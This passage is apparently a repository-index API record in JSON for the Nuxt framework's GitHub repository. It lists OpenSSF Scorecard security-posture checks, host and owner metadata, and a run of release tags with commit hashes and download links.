found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29414277,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-13T06:24:03.484Z","status":"ssl_error","status_checked_at":"2026-02-13T06:23:12.830Z","response_time":78,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":62,"last_synced_at":"2026-01-11T15:52:13.608Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":116453,"followers":4523,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2026-01-11T15:52:13.608Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.21.0","sha":"dbb5e73ec8e99fe1b3c646c112884210c8714298","kind":"commit","published_at":"2026-01-22T23:01:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.21.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0/manifests"},{"name":"v4.3.0","sha":"b5bd7d9195bbd1c9cb174d43f6da2912fbd40bd3","kind":"commit","published_at":"2026-01-22T22:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0/manifests"},{"name":"v4.2.2","sha":"185ae0f6da6cac51c1dcc010b8ca1ae7d5fee518","kind":"commit","published_at":"2025-12-09T17:16:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2/manifests"},{"name":"v3.20.2","sha":"06449a8a7696bb090b6174adabea1b5a40bc5333","kind":"commit","published_at":"2025-12-09T17:10:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2/manifests"},{"name":"v4.2.1","sha":"67ec213b30b0b1cd937d90d72664d19b62e4f830","kind":"commit","published_at":"2025-11-06T23:49:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1/manifests"},{"name":"v3.20.1","sha":"1d2ee45924109c5726562cd11aaabc7ef9b963f8","kind":"commit","published_at":"2025-11-06T23:49:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1/manifests"},{"name":"v3.20.0","sha":"617b266c732267755a8771b967d693b32e74fca4","kind":"commit","published_at":"2025-10-28T10:58:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0/manifests"},{"name":"v4.2.0","sha":"be83cda268dec7a6e8b6a00d2777bfffb6435a83","kind":"commit","published_at":"2025-10-25T05:54:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0/manifests"},{"name":"v4.1.3","sha":"2311b272f5935b82766dd9365fb7d81f72310ec2","kind":"commit","published_at":"2025-10-06T15:52:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3/manifests"},{"name":"v3.19.3","sha":"f8874385b630b713a8dc0b85a98b64b982dc89ef","kind":"commit","published_at":"2025-10-06T15:47:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3/manifests"},{"name":"v4.1.2","sha":"412786a1d8283aaa2360a855d44ebd3ac21924f1","kind":"commit","published_at":"2025-09-12T21:44:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2/manifests"},{"name":"v3.19.2","sha":"350813b5a0b5f1b7f12ff95185e0a5946b42d625","kind":"commit","published_at":"2025-09-12T21:40:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2/manifests"},{"name":"v4.1.1","sha":"f09180c493abb21b76ca26365ec21a77232f5f8d","kind":"commit","published_at":"2025-09-05T22:25:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1/manifests"},{"name":"v3.19.1","sha":"544a76ff39e3064b507ed62cd17b1b5dcded7c90","kind":"commit","published_at":"2025-09-05T22:17:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1/manifests"},{"name":"v4.1.0","sha":"e12125a97f91a9c9b98191e4b89a2fcc95c318db","kind":"commit","published_at":"2025-09-02T22:12:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0/manifests"},{"name":"v3.19.0","sha":"895650538445a18b588e09c74d9cb640693b63f6","kind":"commit","published_at":"2025-09-02T22:12:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0/manifests"},{"name":"v4.0.3","sha":"c09da8cfa0684bf70a3d657add7feb88ffd7807d","kind":"commit","published_at":"2025-08-05T08:26:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3/manifests"},{"name":"v3.18.1","sha":"dfac5a97d2ec084e194c04f643221118fec9e4c6","kind":"commit","published_at":"2025-08-05T08:26:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1/manifests"},{"name":"v4.0.2","sha":"5d3ef933c3ab2ee9aa3141b3fea7b1549ade7b3a","kind":"commit","published_at":"2025-07-28T23:50:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2/manifests"},{"name":"v3.18.0","sha":"8d9ebfb2a10596211996778fb14b35a20024c319","kind":"commit","published_at":"2025-07-28T23:48:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0/manifests"},{"name":"v4.0.1","sha":"3cfdac3c204c9d64240719f64935484b2b3318f2","kind":"commit","published_at":"2025-07-21T08:55:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"8aacdde48e8388c8bb11b9a5c2f59935341bfcfd","kind":"commit","published_at":"2025-07-15T22:15:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0/manifests"},{"name":"v3.17.7","sha":"b56bc134455391f3ea43d29140162f0b04b615b0","kind":"commit","published_at":"2025-07-13T19:25:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7/manifests"},{"name":"v4.0.0-rc.0","sha":"0344123b3c2c46c6f591c42696eef8ffc6504947","kind":"commit","published_at":"2025-07-07T22:42:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-rc.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0/manifests"},{"name":"v3.17.6","sha":"9867529347c072efb8da5806f6a973cd853d72e1","kind":"commit","published_at":"2025-07-01T16:46:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6/manifests"},{"name":"v4.0.0-alpha.4","sha":"14dd686b8b47beecf024318ae304919cd81ab4ad","kind":"commit","published_at":"2025-06-27T13:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"8b9e1a1ef774dab5a36a94268439079de1a887de","kind":"commit","published_at":"2025-06-26T16:17:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"4b56bb92b9242df959f091e1d2be72cd492f30ca","kind":"commit","published_at":"2025-06-12T09:16:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2/manifests"},{"name":"v3.17.5","sha":"0fa7ff9908c8a573c1efedf216cdf5ec901820af","kind":"commit","published_at":"2025-06-03T21:38:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5/manifests"},{"name":"v4.0.0-alpha.1","sha":"e379ac3e8dd3b37ca26a01d0dc0ffcbc46ece1aa","kind":"commit","published_at":"2025-06-02T19:45:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1/manifests"},{"name":"v3.17.4","sha":"f7437ce28f83723492a1e540a9b43c56c469234a","kind":"commit","published_at":"2025-05-20T19:57:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4/manifests"},{"name":"v3.17.3","sha":"c6dad342e6718377136c675c64d6e20c420dea81","kind":"commit","published_at":"2025-05-12T13:58:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3/manifests"},{"name":"v3.17.2","sha":"346bb2bfe3324b353ec65d4b2f09b46e0a7c5c71","kind":"commit","published_at":"2025-05-05T08:54:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2/manifests"},{"name":"v3.17.1","sha":"de02d2312d79f0bae4eb382a565253b7ddc98f86","kind":"commit","published_at":"2025-04-29T00:20:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.1","tag_url":"https://repos.